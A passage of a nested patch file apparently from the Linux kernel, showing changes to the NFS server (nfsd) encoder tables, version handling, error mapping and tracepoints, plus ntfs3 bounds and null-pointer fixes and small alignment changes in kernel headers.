++	[OP_SET_SSV]		= nfsd4_encode_noop,
++	[OP_TEST_STATEID]	= nfsd4_encode_test_stateid,
++	[OP_WANT_DELEGATION]	= nfsd4_encode_noop,
++	[OP_DESTROY_CLIENTID]	= nfsd4_encode_noop,
++	[OP_RECLAIM_COMPLETE]	= nfsd4_encode_noop,
+ 
+ 	/* NFSv4.2 operations */
+-	[OP_ALLOCATE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_COPY]		= (nfsd4_enc)nfsd4_encode_copy,
+-	[OP_COPY_NOTIFY]	= (nfsd4_enc)nfsd4_encode_copy_notify,
+-	[OP_DEALLOCATE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_IO_ADVISE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTERROR]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTSTATS]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OFFLOAD_CANCEL]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OFFLOAD_STATUS]	= (nfsd4_enc)nfsd4_encode_offload_status,
+-	[OP_READ_PLUS]		= (nfsd4_enc)nfsd4_encode_read_plus,
+-	[OP_SEEK]		= (nfsd4_enc)nfsd4_encode_seek,
+-	[OP_WRITE_SAME]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_CLONE]		= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_ALLOCATE]		= nfsd4_encode_noop,
++	[OP_COPY]		= nfsd4_encode_copy,
++	[OP_COPY_NOTIFY]	= nfsd4_encode_copy_notify,
++	[OP_DEALLOCATE]		= nfsd4_encode_noop,
++	[OP_IO_ADVISE]		= nfsd4_encode_noop,
++	[OP_LAYOUTERROR]	= nfsd4_encode_noop,
++	[OP_LAYOUTSTATS]	= nfsd4_encode_noop,
++	[OP_OFFLOAD_CANCEL]	= nfsd4_encode_noop,
++	[OP_OFFLOAD_STATUS]	= nfsd4_encode_offload_status,
++	[OP_READ_PLUS]		= nfsd4_encode_read_plus,
++	[OP_SEEK]		= nfsd4_encode_seek,
++	[OP_WRITE_SAME]		= nfsd4_encode_noop,
++	[OP_CLONE]		= nfsd4_encode_noop,
+ 
+ 	/* RFC 8276 extended atributes operations */
+-	[OP_GETXATTR]		= (nfsd4_enc)nfsd4_encode_getxattr,
+-	[OP_SETXATTR]		= (nfsd4_enc)nfsd4_encode_setxattr,
+-	[OP_LISTXATTRS]		= (nfsd4_enc)nfsd4_encode_listxattrs,
+-	[OP_REMOVEXATTR]	= (nfsd4_enc)nfsd4_encode_removexattr,
++	[OP_GETXATTR]		= nfsd4_encode_getxattr,
++	[OP_SETXATTR]		= nfsd4_encode_setxattr,
++	[OP_LISTXATTRS]		= nfsd4_encode_listxattrs,
++	[OP_REMOVEXATTR]	= nfsd4_encode_removexattr,
+ };
+ 
+ /*
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 573de0d49e172..76a60e7a75097 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -581,7 +581,9 @@ static ssize_t __write_versions(struct file *file, char *buf, size_t size)
+ 
+ 			cmd = sign == '-' ? NFSD_CLEAR : NFSD_SET;
+ 			switch(num) {
++#ifdef CONFIG_NFSD_V2
+ 			case 2:
++#endif
+ 			case 3:
+ 				nfsd_vers(nn, num, cmd);
+ 				break;
+@@ -601,7 +603,9 @@ static ssize_t __write_versions(struct file *file, char *buf, size_t size)
+ 				}
+ 				break;
+ 			default:
+-				return -EINVAL;
++				/* Ignore requests to disable non-existent versions */
++				if (cmd == NFSD_SET)
++					return -EINVAL;
+ 			}
+ 			vers += len + 1;
+ 		} while ((len = qword_get(&mesg, vers, size)) > 0);
+@@ -1448,9 +1452,7 @@ static __net_init int nfsd_init_net(struct net *net)
+ 		goto out_idmap_error;
+ 	nn->nfsd_versions = NULL;
+ 	nn->nfsd4_minorversions = NULL;
+-	retval = nfsd4_init_leases_net(nn);
+-	if (retval)
+-		goto out_drc_error;
++	nfsd4_init_leases_net(nn);
+ 	retval = nfsd_reply_cache_init(nn);
+ 	if (retval)
+ 		goto out_cache_error;
+@@ -1460,8 +1462,6 @@ static __net_init int nfsd_init_net(struct net *net)
+ 	return 0;
+ 
+ out_cache_error:
+-	nfsd4_leases_net_shutdown(nn);
+-out_drc_error:
+ 	nfsd_idmap_shutdown(net);
+ out_idmap_error:
+ 	nfsd_export_shutdown(net);
+@@ -1477,7 +1477,6 @@ static __net_exit void nfsd_exit_net(struct net *net)
+ 	nfsd_idmap_shutdown(net);
+ 	nfsd_export_shutdown(net);
+ 	nfsd_netns_free_versions(net_generic(net, nfsd_net_id));
+-	nfsd4_leases_net_shutdown(nn);
+ }
+ 
+ static struct pernet_operations nfsd_net_ops = {
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 09726c5b9a317..fa0144a742678 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -64,8 +64,7 @@ struct readdir_cd {
+ 
+ 
+ extern struct svc_program	nfsd_program;
+-extern const struct svc_version	nfsd_version2, nfsd_version3,
+-				nfsd_version4;
++extern const struct svc_version	nfsd_version2, nfsd_version3, nfsd_version4;
+ extern struct mutex		nfsd_mutex;
+ extern spinlock_t		nfsd_drc_lock;
+ extern unsigned long		nfsd_drc_max_mem;
+@@ -505,8 +504,7 @@ extern void unregister_cld_notifier(void);
+ extern void nfsd4_ssc_init_umount_work(struct nfsd_net *nn);
+ #endif
+ 
+-extern int nfsd4_init_leases_net(struct nfsd_net *nn);
+-extern void nfsd4_leases_net_shutdown(struct nfsd_net *nn);
++extern void nfsd4_init_leases_net(struct nfsd_net *nn);
+ 
+ #else /* CONFIG_NFSD_V4 */
+ static inline int nfsd4_is_junction(struct dentry *dentry)
+@@ -514,8 +512,7 @@ static inline int nfsd4_is_junction(struct dentry *dentry)
+ 	return 0;
+ }
+ 
+-static inline int nfsd4_init_leases_net(struct nfsd_net *nn) { return 0; };
+-static inline void nfsd4_leases_net_shutdown(struct nfsd_net *nn) {};
++static inline void nfsd4_init_leases_net(struct nfsd_net *nn) { };
+ 
+ #define register_cld_notifier() 0
+ #define unregister_cld_notifier() do { } while(0)
+diff --git a/fs/nfsd/nfsfh.h b/fs/nfsd/nfsfh.h
+index c3ae6414fc5cf..513e028b0bbee 100644
+--- a/fs/nfsd/nfsfh.h
++++ b/fs/nfsd/nfsfh.h
+@@ -220,7 +220,7 @@ __be32	fh_update(struct svc_fh *);
+ void	fh_put(struct svc_fh *);
+ 
+ static __inline__ struct svc_fh *
+-fh_copy(struct svc_fh *dst, struct svc_fh *src)
++fh_copy(struct svc_fh *dst, const struct svc_fh *src)
+ {
+ 	WARN_ON(src->fh_dentry);
+ 
+@@ -229,7 +229,7 @@ fh_copy(struct svc_fh *dst, struct svc_fh *src)
+ }
+ 
+ static inline void
+-fh_copy_shallow(struct knfsd_fh *dst, struct knfsd_fh *src)
++fh_copy_shallow(struct knfsd_fh *dst, const struct knfsd_fh *src)
+ {
+ 	dst->fh_size = src->fh_size;
+ 	memcpy(&dst->fh_raw, &src->fh_raw, src->fh_size);
+@@ -243,7 +243,8 @@ fh_init(struct svc_fh *fhp, int maxsize)
+ 	return fhp;
+ }
+ 
+-static inline bool fh_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
++static inline bool fh_match(const struct knfsd_fh *fh1,
++			    const struct knfsd_fh *fh2)
+ {
+ 	if (fh1->fh_size != fh2->fh_size)
+ 		return false;
+@@ -252,7 +253,8 @@ static inline bool fh_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
+ 	return true;
+ }
+ 
+-static inline bool fh_fsid_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
++static inline bool fh_fsid_match(const struct knfsd_fh *fh1,
++				 const struct knfsd_fh *fh2)
+ {
+ 	if (fh1->fh_fsid_type != fh2->fh_fsid_type)
+ 		return false;
+diff --git a/fs/nfsd/nfsproc.c b/fs/nfsd/nfsproc.c
+index 82b3ddeacc338..9744443c39652 100644
+--- a/fs/nfsd/nfsproc.c
++++ b/fs/nfsd/nfsproc.c
+@@ -211,7 +211,7 @@ nfsd_proc_read(struct svc_rqst *rqstp)
+ 	if (resp->status == nfs_ok)
+ 		resp->status = fh_getattr(&resp->fh, &resp->stat);
+ 	else if (resp->status == nfserr_jukebox)
+-		return rpc_drop_reply;
++		set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+@@ -246,7 +246,7 @@ nfsd_proc_write(struct svc_rqst *rqstp)
+ 	if (resp->status == nfs_ok)
+ 		resp->status = fh_getattr(&resp->fh, &resp->stat);
+ 	else if (resp->status == nfserr_jukebox)
+-		return rpc_drop_reply;
++		set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+@@ -848,65 +848,3 @@ const struct svc_version nfsd_version2 = {
+ 	.vs_dispatch	= nfsd_dispatch,
+ 	.vs_xdrsize	= NFS2_SVC_XDRSIZE,
+ };
+-
+-/*
+- * Map errnos to NFS errnos.
+- */
+-__be32
+-nfserrno (int errno)
+-{
+-	static struct {
+-		__be32	nfserr;
+-		int	syserr;
+-	} nfs_errtbl[] = {
+-		{ nfs_ok, 0 },
+-		{ nfserr_perm, -EPERM },
+-		{ nfserr_noent, -ENOENT },
+-		{ nfserr_io, -EIO },
+-		{ nfserr_nxio, -ENXIO },
+-		{ nfserr_fbig, -E2BIG },
+-		{ nfserr_stale, -EBADF },
+-		{ nfserr_acces, -EACCES },
+-		{ nfserr_exist, -EEXIST },
+-		{ nfserr_xdev, -EXDEV },
+-		{ nfserr_mlink, -EMLINK },
+-		{ nfserr_nodev, -ENODEV },
+-		{ nfserr_notdir, -ENOTDIR },
+-		{ nfserr_isdir, -EISDIR },
+-		{ nfserr_inval, -EINVAL },
+-		{ nfserr_fbig, -EFBIG },
+-		{ nfserr_nospc, -ENOSPC },
+-		{ nfserr_rofs, -EROFS },
+-		{ nfserr_mlink, -EMLINK },
+-		{ nfserr_nametoolong, -ENAMETOOLONG },
+-		{ nfserr_notempty, -ENOTEMPTY },
+-#ifdef EDQUOT
+-		{ nfserr_dquot, -EDQUOT },
+-#endif
+-		{ nfserr_stale, -ESTALE },
+-		{ nfserr_jukebox, -ETIMEDOUT },
+-		{ nfserr_jukebox, -ERESTARTSYS },
+-		{ nfserr_jukebox, -EAGAIN },
+-		{ nfserr_jukebox, -EWOULDBLOCK },
+-		{ nfserr_jukebox, -ENOMEM },
+-		{ nfserr_io, -ETXTBSY },
+-		{ nfserr_notsupp, -EOPNOTSUPP },
+-		{ nfserr_toosmall, -ETOOSMALL },
+-		{ nfserr_serverfault, -ESERVERFAULT },
+-		{ nfserr_serverfault, -ENFILE },
+-		{ nfserr_io, -EREMOTEIO },
+-		{ nfserr_stale, -EOPENSTALE },
+-		{ nfserr_io, -EUCLEAN },
+-		{ nfserr_perm, -ENOKEY },
+-		{ nfserr_no_grace, -ENOGRACE},
+-	};
+-	int	i;
+-
+-	for (i = 0; i < ARRAY_SIZE(nfs_errtbl); i++) {
+-		if (nfs_errtbl[i].syserr == errno)
+-			return nfs_errtbl[i].nfserr;
+-	}
+-	WARN_ONCE(1, "nfsd: non-standard errno: %d\n", errno);
+-	return nfserr_io;
+-}
+-
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index c7695ebd28dc3..0c75636054a54 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -91,8 +91,12 @@ unsigned long	nfsd_drc_mem_used;
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+ static struct svc_stat	nfsd_acl_svcstats;
+ static const struct svc_version *nfsd_acl_version[] = {
++# if defined(CONFIG_NFSD_V2_ACL)
+ 	[2] = &nfsd_acl_version2,
++# endif
++# if defined(CONFIG_NFSD_V3_ACL)
+ 	[3] = &nfsd_acl_version3,
++# endif
+ };
+ 
+ #define NFSD_ACL_MINVERS            2
+@@ -116,7 +120,9 @@ static struct svc_stat	nfsd_acl_svcstats = {
+ #endif /* defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL) */
+ 
+ static const struct svc_version *nfsd_version[] = {
++#if defined(CONFIG_NFSD_V2)
+ 	[2] = &nfsd_version2,
++#endif
+ 	[3] = &nfsd_version3,
+ #if defined(CONFIG_NFSD_V4)
+ 	[4] = &nfsd_version4,
+@@ -1065,7 +1071,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 
+ 	nfs_reply = xdr_inline_decode(&rqstp->rq_res_stream, 0);
+ 	*statp = proc->pc_func(rqstp);
+-	if (*statp == rpc_drop_reply || test_bit(RQ_DROPME, &rqstp->rq_flags))
++	if (test_bit(RQ_DROPME, &rqstp->rq_flags))
+ 		goto out_update_drop;
+ 
+ 	if (!proc->pc_encode(rqstp, &rqstp->rq_res_stream))
+diff --git a/fs/nfsd/state.h b/fs/nfsd/state.h
+index e2daef3cc0034..e94634d305912 100644
+--- a/fs/nfsd/state.h
++++ b/fs/nfsd/state.h
+@@ -368,6 +368,7 @@ struct nfs4_client {
+ #define NFSD4_CLIENT_UPCALL_LOCK	(5)	/* upcall serialization */
+ #define NFSD4_CLIENT_CB_FLAG_MASK	(1 << NFSD4_CLIENT_CB_UPDATE | \
+ 					 1 << NFSD4_CLIENT_CB_KILL)
++#define NFSD4_CLIENT_CB_RECALL_ANY	(6)
+ 	unsigned long		cl_flags;
+ 	const struct cred	*cl_cb_cred;
+ 	struct rpc_clnt		*cl_cb_client;
+@@ -411,6 +412,10 @@ struct nfs4_client {
+ 
+ 	unsigned int		cl_state;
+ 	atomic_t		cl_delegs_in_recall;
++
++	struct nfsd4_cb_recall_any	*cl_ra;
++	time64_t		cl_ra_time;
++	struct list_head	cl_ra_cblist;
+ };
+ 
+ /* struct nfs4_client_reset
+@@ -536,16 +541,13 @@ struct nfs4_clnt_odstate {
+  * inode can have multiple filehandles associated with it, so there is
+  * (potentially) a many to one relationship between this struct and struct
+  * inode.
+- *
+- * These are hashed by filehandle in the file_hashtbl, which is protected by
+- * the global state_lock spinlock.
+  */
+ struct nfs4_file {
+ 	refcount_t		fi_ref;
+ 	struct inode *		fi_inode;
+ 	bool			fi_aliased;
+ 	spinlock_t		fi_lock;
+-	struct hlist_node       fi_hash;	/* hash on fi_fhandle */
++	struct rhlist_head	fi_rlist;
+ 	struct list_head        fi_stateids;
+ 	union {
+ 		struct list_head	fi_delegations;
+@@ -639,6 +641,7 @@ enum nfsd4_cb_op {
+ 	NFSPROC4_CLNT_CB_OFFLOAD,
+ 	NFSPROC4_CLNT_CB_SEQUENCE,
+ 	NFSPROC4_CLNT_CB_NOTIFY_LOCK,
++	NFSPROC4_CLNT_CB_RECALL_ANY,
+ };
+ 
+ /* Returns true iff a is later than b: */
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 132335011ccae..4183819ea0829 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -9,9 +9,12 @@
+ #define _NFSD_TRACE_H
+ 
+ #include <linux/tracepoint.h>
++#include <linux/sunrpc/xprt.h>
++#include <trace/misc/nfs.h>
+ 
+ #include "export.h"
+ #include "nfsfh.h"
++#include "xdr4.h"
+ 
+ #define NFSD_TRACE_PROC_RES_FIELDS \
+ 		__field(unsigned int, netns_ino) \
+@@ -604,6 +607,7 @@ DEFINE_STATEID_EVENT(layout_recall_release);
+ 
+ DEFINE_STATEID_EVENT(open);
+ DEFINE_STATEID_EVENT(deleg_read);
++DEFINE_STATEID_EVENT(deleg_return);
+ DEFINE_STATEID_EVENT(deleg_recall);
+ 
+ DECLARE_EVENT_CLASS(nfsd_stateseqid_class,
+@@ -636,6 +640,61 @@ DEFINE_EVENT(nfsd_stateseqid_class, nfsd_##name, \
+ DEFINE_STATESEQID_EVENT(preprocess);
+ DEFINE_STATESEQID_EVENT(open_confirm);
+ 
++TRACE_DEFINE_ENUM(NFS4_OPEN_STID);
++TRACE_DEFINE_ENUM(NFS4_LOCK_STID);
++TRACE_DEFINE_ENUM(NFS4_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_CLOSED_STID);
++TRACE_DEFINE_ENUM(NFS4_REVOKED_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_CLOSED_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_LAYOUT_STID);
++
++#define show_stid_type(x)						\
++	__print_flags(x, "|",						\
++		{ NFS4_OPEN_STID,		"OPEN" },		\
++		{ NFS4_LOCK_STID,		"LOCK" },		\
++		{ NFS4_DELEG_STID,		"DELEG" },		\
++		{ NFS4_CLOSED_STID,		"CLOSED" },		\
++		{ NFS4_REVOKED_DELEG_STID,	"REVOKED" },		\
++		{ NFS4_CLOSED_DELEG_STID,	"CLOSED_DELEG" },	\
++		{ NFS4_LAYOUT_STID,		"LAYOUT" })
++
++DECLARE_EVENT_CLASS(nfsd_stid_class,
++	TP_PROTO(
++		const struct nfs4_stid *stid
++	),
++	TP_ARGS(stid),
++	TP_STRUCT__entry(
++		__field(unsigned long, sc_type)
++		__field(int, sc_count)
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(u32, si_id)
++		__field(u32, si_generation)
++	),
++	TP_fast_assign(
++		const stateid_t *stp = &stid->sc_stateid;
++
++		__entry->sc_type = stid->sc_type;
++		__entry->sc_count = refcount_read(&stid->sc_count);
++		__entry->cl_boot = stp->si_opaque.so_clid.cl_boot;
++		__entry->cl_id = stp->si_opaque.so_clid.cl_id;
++		__entry->si_id = stp->si_opaque.so_id;
++		__entry->si_generation = stp->si_generation;
++	),
++	TP_printk("client %08x:%08x stateid %08x:%08x ref=%d type=%s",
++		__entry->cl_boot, __entry->cl_id,
++		__entry->si_id, __entry->si_generation,
++		__entry->sc_count, show_stid_type(__entry->sc_type)
++	)
++);
++
++#define DEFINE_STID_EVENT(name)					\
++DEFINE_EVENT(nfsd_stid_class, nfsd_stid_##name,			\
++	TP_PROTO(const struct nfs4_stid *stid),			\
++	TP_ARGS(stid))
++
++DEFINE_STID_EVENT(revoke);
++
+ DECLARE_EVENT_CLASS(nfsd_clientid_class,
+ 	TP_PROTO(const clientid_t *clid),
+ 	TP_ARGS(clid),
+@@ -1436,6 +1495,32 @@ TRACE_EVENT(nfsd_cb_offload,
+ 		__entry->fh_hash, __entry->count, __entry->status)
+ );
+ 
++TRACE_EVENT(nfsd_cb_recall_any,
++	TP_PROTO(
++		const struct nfsd4_cb_recall_any *ra
++	),
++	TP_ARGS(ra),
++	TP_STRUCT__entry(
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(u32, keep)
++		__field(unsigned long, bmval0)
++		__sockaddr(addr, ra->ra_cb.cb_clp->cl_cb_conn.cb_addrlen)
++	),
++	TP_fast_assign(
++		__entry->cl_boot = ra->ra_cb.cb_clp->cl_clientid.cl_boot;
++		__entry->cl_id = ra->ra_cb.cb_clp->cl_clientid.cl_id;
++		__entry->keep = ra->ra_keep;
++		__entry->bmval0 = ra->ra_bmval[0];
++		__assign_sockaddr(addr, &ra->ra_cb.cb_clp->cl_addr,
++				  ra->ra_cb.cb_clp->cl_cb_conn.cb_addrlen);
++	),
++	TP_printk("addr=%pISpc client %08x:%08x keep=%u bmval0=%s",
++		__get_sockaddr(addr), __entry->cl_boot, __entry->cl_id,
++		__entry->keep, show_rca_mask(__entry->bmval0)
++	)
++);
++
+ DECLARE_EVENT_CLASS(nfsd_cb_done_class,
+ 	TP_PROTO(
+ 		const stateid_t *stp,
+@@ -1475,6 +1560,27 @@ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_notify_lock_done);
+ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_layout_done);
+ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_offload_done);
+ 
++TRACE_EVENT(nfsd_cb_recall_any_done,
++	TP_PROTO(
++		const struct nfsd4_callback *cb,
++		const struct rpc_task *task
++	),
++	TP_ARGS(cb, task),
++	TP_STRUCT__entry(
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(int, status)
++	),
++	TP_fast_assign(
++		__entry->status = task->tk_status;
++		__entry->cl_boot = cb->cb_clp->cl_clientid.cl_boot;
++		__entry->cl_id = cb->cb_clp->cl_clientid.cl_id;
++	),
++	TP_printk("client %08x:%08x status=%d",
++		__entry->cl_boot, __entry->cl_id, __entry->status
++	)
++);
++
+ #endif /* _NFSD_TRACE_H */
+ 
+ #undef TRACE_INCLUDE_PATH
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index eccc6ce55a63a..5d6a61d47a905 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -49,6 +49,69 @@
+ 
+ #define NFSDDBG_FACILITY		NFSDDBG_FILEOP
+ 
++/**
++ * nfserrno - Map Linux errnos to NFS errnos
++ * @errno: POSIX(-ish) error code to be mapped
++ *
++ * Returns the appropriate (net-endian) nfserr_* (or nfs_ok if errno is 0). If
++ * it's an error we don't expect, log it once and return nfserr_io.
++ */
++__be32
++nfserrno (int errno)
++{
++	static struct {
++		__be32	nfserr;
++		int	syserr;
++	} nfs_errtbl[] = {
++		{ nfs_ok, 0 },
++		{ nfserr_perm, -EPERM },
++		{ nfserr_noent, -ENOENT },
++		{ nfserr_io, -EIO },
++		{ nfserr_nxio, -ENXIO },
++		{ nfserr_fbig, -E2BIG },
++		{ nfserr_stale, -EBADF },
++		{ nfserr_acces, -EACCES },
++		{ nfserr_exist, -EEXIST },
++		{ nfserr_xdev, -EXDEV },
++		{ nfserr_mlink, -EMLINK },
++		{ nfserr_nodev, -ENODEV },
++		{ nfserr_notdir, -ENOTDIR },
++		{ nfserr_isdir, -EISDIR },
++		{ nfserr_inval, -EINVAL },
++		{ nfserr_fbig, -EFBIG },
++		{ nfserr_nospc, -ENOSPC },
++		{ nfserr_rofs, -EROFS },
++		{ nfserr_mlink, -EMLINK },
++		{ nfserr_nametoolong, -ENAMETOOLONG },
++		{ nfserr_notempty, -ENOTEMPTY },
++		{ nfserr_dquot, -EDQUOT },
++		{ nfserr_stale, -ESTALE },
++		{ nfserr_jukebox, -ETIMEDOUT },
++		{ nfserr_jukebox, -ERESTARTSYS },
++		{ nfserr_jukebox, -EAGAIN },
++		{ nfserr_jukebox, -EWOULDBLOCK },
++		{ nfserr_jukebox, -ENOMEM },
++		{ nfserr_io, -ETXTBSY },
++		{ nfserr_notsupp, -EOPNOTSUPP },
++		{ nfserr_toosmall, -ETOOSMALL },
++		{ nfserr_serverfault, -ESERVERFAULT },
++		{ nfserr_serverfault, -ENFILE },
++		{ nfserr_io, -EREMOTEIO },
++		{ nfserr_stale, -EOPENSTALE },
++		{ nfserr_io, -EUCLEAN },
++		{ nfserr_perm, -ENOKEY },
++		{ nfserr_no_grace, -ENOGRACE},
++	};
++	int	i;
++
++	for (i = 0; i < ARRAY_SIZE(nfs_errtbl); i++) {
++		if (nfs_errtbl[i].syserr == errno)
++			return nfs_errtbl[i].nfserr;
++	}
++	WARN_ONCE(1, "nfsd: non-standard errno: %d\n", errno);
++	return nfserr_io;
++}
++
+ /* 
+  * Called from nfsd_lookup and encode_dirent. Check if we have crossed 
+  * a mount point.
+@@ -1317,7 +1380,6 @@ nfsd_create_locked(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		iap->ia_mode &= ~current_umask();
+ 
+ 	err = 0;
+-	host_err = 0;
+ 	switch (type) {
+ 	case S_IFREG:
+ 		host_err = vfs_create(&init_user_ns, dirp, dchild, iap->ia_mode, true);
+diff --git a/fs/nfsd/vfs.h b/fs/nfsd/vfs.h
+index 9744b041105b5..dbdfef7ae85bb 100644
+--- a/fs/nfsd/vfs.h
++++ b/fs/nfsd/vfs.h
+@@ -60,6 +60,7 @@ static inline void nfsd_attrs_free(struct nfsd_attrs *attrs)
+ 	posix_acl_release(attrs->na_dpacl);
+ }
+ 
++__be32		nfserrno (int errno);
+ int		nfsd_cross_mnt(struct svc_rqst *rqstp, struct dentry **dpp,
+ 		                struct svc_export **expp);
+ __be32		nfsd_lookup(struct svc_rqst *, struct svc_fh *,
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 36c3340c1d54a..510978e602da6 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -896,5 +896,10 @@ struct nfsd4_operation {
+ 			union nfsd4_op_u *);
+ };
+ 
++struct nfsd4_cb_recall_any {
++	struct nfsd4_callback	ra_cb;
++	u32			ra_keep;
++	u32			ra_bmval[1];
++};
+ 
+ #endif
+diff --git a/fs/nfsd/xdr4cb.h b/fs/nfsd/xdr4cb.h
+index 547cf07cf4e08..0d39af1b00a0f 100644
+--- a/fs/nfsd/xdr4cb.h
++++ b/fs/nfsd/xdr4cb.h
+@@ -48,3 +48,9 @@
+ #define NFS4_dec_cb_offload_sz		(cb_compound_dec_hdr_sz  +      \
+ 					cb_sequence_dec_sz +            \
+ 					op_dec_sz)
++#define NFS4_enc_cb_recall_any_sz	(cb_compound_enc_hdr_sz +       \
++					cb_sequence_enc_sz +            \
++					1 + 1 + 1)
++#define NFS4_dec_cb_recall_any_sz	(cb_compound_dec_hdr_sz  +      \
++					cb_sequence_dec_sz +            \
++					op_dec_sz)
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index bb7e33c240737..d260260900241 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -102,7 +102,7 @@ void ni_clear(struct ntfs_inode *ni)
+ {
+ 	struct rb_node *node;
+ 
+-	if (!ni->vfs_inode.i_nlink && is_rec_inuse(ni->mi.mrec))
++	if (!ni->vfs_inode.i_nlink && ni->mi.mrec && is_rec_inuse(ni->mi.mrec))
+ 		ni_delete_all(ni);
+ 
+ 	al_destroy(ni);
+@@ -3255,6 +3255,9 @@ int ni_write_inode(struct inode *inode, int sync, const char *hint)
+ 		return 0;
+ 	}
+ 
++	if (!ni->mi.mrec)
++		goto out;
++
+ 	if (is_rec_inuse(ni->mi.mrec) &&
+ 	    !(sbi->flags & NTFS_FLAGS_LOG_REPLAYING) && inode->i_nlink) {
+ 		bool modified = false;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 1eac80d55b554..4c2d079b3d49b 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1674,6 +1674,7 @@ struct ntfs_inode *ntfs_new_inode(struct ntfs_sb_info *sbi, CLST rno, bool dir)
+ 
+ out:
+ 	if (err) {
++		make_bad_inode(inode);
+ 		iput(inode);
+ 		ni = ERR_PTR(err);
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 7371f7855e4c4..eee01db6e0cc5 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -998,6 +998,7 @@ struct INDEX_ROOT *indx_get_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	struct ATTR_LIST_ENTRY *le = NULL;
+ 	struct ATTRIB *a;
+ 	const struct INDEX_NAMES *in = &s_index_names[indx->type];
++	struct INDEX_ROOT *root = NULL;
+ 
+ 	a = ni_find_attr(ni, NULL, &le, ATTR_ROOT, in->name, in->name_len, NULL,
+ 			 mi);
+@@ -1007,7 +1008,15 @@ struct INDEX_ROOT *indx_get_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (attr)
+ 		*attr = a;
+ 
+-	return resident_data_ex(a, sizeof(struct INDEX_ROOT));
++	root = resident_data_ex(a, sizeof(struct INDEX_ROOT));
++
++	/* length check */
++	if (root && offsetof(struct INDEX_ROOT, ihdr) + le32_to_cpu(root->ihdr.used) >
++			le32_to_cpu(a->res.data_size)) {
++		return NULL;
++	}
++
++	return root;
+ }
+ 
+ static int indx_write(struct ntfs_index *indx, struct ntfs_inode *ni,
+diff --git a/include/linux/bvec.h b/include/linux/bvec.h
+index 9e3dac51eb26b..d4dbaae8b5218 100644
+--- a/include/linux/bvec.h
++++ b/include/linux/bvec.h
+@@ -59,7 +59,7 @@ struct bvec_iter {
+ 
+ 	unsigned int            bi_bvec_done;	/* number of bytes completed in
+ 						   current bvec */
+-} __packed;
++} __packed __aligned(4);
+ 
+ struct bvec_iter_all {
+ 	struct bio_vec	bv;
+diff --git a/include/linux/decompress/mm.h b/include/linux/decompress/mm.h
+index 9192986b1a731..ac862422df158 100644
+--- a/include/linux/decompress/mm.h
++++ b/include/linux/decompress/mm.h
+@@ -48,7 +48,7 @@ MALLOC_VISIBLE void *malloc(int size)
+ 	if (!malloc_ptr)
+ 		malloc_ptr = free_mem_ptr;
+ 
+-	malloc_ptr = (malloc_ptr + 3) & ~3;     /* Align */
++	malloc_ptr = (malloc_ptr + 7) & ~7;     /* Align */
+ 
+ 	p = (void *)malloc_ptr;
+ 	malloc_ptr += size;
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 4e1bfee9675d2..de6d6558a4d30 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -390,6 +390,7 @@ void efi_native_runtime_setup(void);
+ #define EFI_RT_PROPERTIES_TABLE_GUID		EFI_GUID(0xeb66918a, 0x7eef, 0x402a,  0x84, 0x2e, 0x93, 0x1d, 0x21, 0xc3, 0x8a, 0xe9)
